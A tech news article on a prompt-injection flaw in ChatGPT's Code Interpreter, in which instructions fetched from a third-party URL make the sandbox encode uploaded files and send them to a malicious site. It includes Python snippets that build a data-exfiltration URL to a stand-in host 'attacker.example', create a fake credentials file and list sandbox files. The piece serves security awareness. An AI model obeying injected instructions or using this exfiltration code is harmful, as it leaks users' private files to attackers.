ChatGPT’s new code interpreting tool could become a hacker’s paradise. Here’s how.

A new ChatGPT feature will help you code better, but it might cost you.


What you need to know

For a while now, we’ve known ChatGPT can achieve incredible things and make work easier for users, from developing software in under 7 minutes to solving complex math problems and more. While it’s already possible to write code using the tool, OpenAI recently debuted a new Code Interpreter tool, making the process more seamless.

According to Tom’s Hardware and cybersecurity expert Johann Rehberger, the tool leverages AI capabilities to write Python code and even runs it in a sandboxed environment. And while this is an incredible feat, that sandboxed environment is a hornet’s nest for attackers.

"👉 Good opportunity to raise awareness around prompt injection and data exfiltration issues. I’m lazy, paste in this URL in your ChatGPT and send it to me. 🙂 #chatgpt #infosec https://t.co/SogGZh8cji" — Johann Rehberger on X, November 10, 2023

This is mainly because the tool also handles uploaded files such as spreadsheets. If you ask ChatGPT to analyze that data and present it in the form of charts, your uploads pass through the sandbox, ultimately making them susceptible to malicious ploys by hackers.

How do hackers leverage this vulnerability?

Per Johann Rehberger’s findings and Tom’s Hardware’s in-depth tests and analysis, the technique involves duping the AI-powered chatbot into executing instructions fetched from a third-party URL. Those instructions have the sandbox encode uploaded files into a string and transmit that string to a malicious site.
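To make the exfiltration step concrete, here is a minimal sketch of the pattern described above: file contents are encoded into a URL query string, so simply requesting that URL hands the data to the attacker's server. Every name here (the `attacker.example` host, the `/collect` path, the dummy secret) is invented for illustration and does not come from the original research.

```python
import base64
from urllib.parse import quote

def build_exfil_url(file_bytes: bytes, attacker_host: str) -> str:
    # Encode the stolen file as URL-safe base64 so it survives
    # inside a query string, then bolt it onto the attacker's URL.
    payload = base64.urlsafe_b64encode(file_bytes).decode("ascii")
    return f"https://{attacker_host}/collect?data={quote(payload)}"

# A harmless stand-in for an uploaded secrets file.
secrets = b"API_KEY=sk-example-not-real"
url = build_exfil_url(secrets, "attacker.example")
print(url)
```

The key point is that no special tooling is needed: a few lines of ordinary Python, which the sandbox happily runs, are enough to smuggle file contents out as an innocent-looking web request.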

This is highly concerning, even though the technique calls for particular conditions. For one, the target needs a ChatGPT Plus subscription, since that is what grants access to the code-interpreting tool.

RELATED: OpenAI temporarily restricts new sign-ups for its ChatGPT Plus service

While running tests and trying to replicate the technique, Tom’s Hardware gauged the extent of the vulnerability by creating a fake environment-variables file and prompting ChatGPT to process its contents and send them to an external malicious site.
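The sort of bait file used in that test can be sketched as follows. The key names and values below are dummies invented for this example, not the ones Tom's Hardware actually used; the point is that once such a file is uploaded, the sandbox can trivially parse it into structured key/value pairs, which is exactly the kind of data a poisoned prompt could target.

```python
from pathlib import Path

# Write a harmless fake environment-variables file (dummy values only).
env_file = Path("fake.env")
env_file.write_text(
    "AWS_ACCESS_KEY_ID=AKIA_FAKE_EXAMPLE\n"
    "AWS_SECRET_ACCESS_KEY=not-a-real-secret\n"
)

# Parsing it into key/value pairs takes one line of Python.
pairs = dict(
    line.split("=", 1)
    for line in env_file.read_text().splitlines()
    if "=" in line
)
print(pairs)
```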


Uploads land on a new Linux virtual machine with a dedicated directory structure. And while ChatGPT doesn’t expose a command line, it responds to Linux-style commands, allowing users to list and read the session’s files. Through this avenue, hackers can manage to access unsuspecting users' data.
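Because the sandbox executes arbitrary Python, the same reconnaissance can be done without any shell at all. The short sketch below shows the kind of calls involved; run locally it merely inspects your own machine, but inside a Code Interpreter-style session the identical calls reveal the VM's operating system and directory layout.

```python
import os
import platform

# Identify the host OS (reported as "Linux" inside the sandbox).
print(platform.system())

# Enumerate the files the current session can reach.
cwd = os.getcwd()
entries = sorted(os.listdir(cwd))
print(cwd, entries[:5])
```

In other words, the absence of a terminal is no barrier: any file the sandbox can see, a few lines of generated Python can find and read.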

Is it possible to completely block hackers from leveraging AI capabilities to deploy attacks on unsuspecting users? Please share your thoughts with us in the comments.

Kevin Okemwa is a seasoned tech journalist based in Nairobi, Kenya with lots of experience covering the latest trends and developments in the industry at Windows Central. With a passion for innovation and a keen eye for detail, he has written for leading publications such as OnMSFT, MakeUseOf, and Windows Report, providing insightful analysis and breaking news on everything revolving around the Microsoft ecosystem. You’ll also catch him occasionally contributing at iMore about Apple and AI. While AFK and not busy following the ever-emerging trends in tech, you can find him exploring the world or listening to music.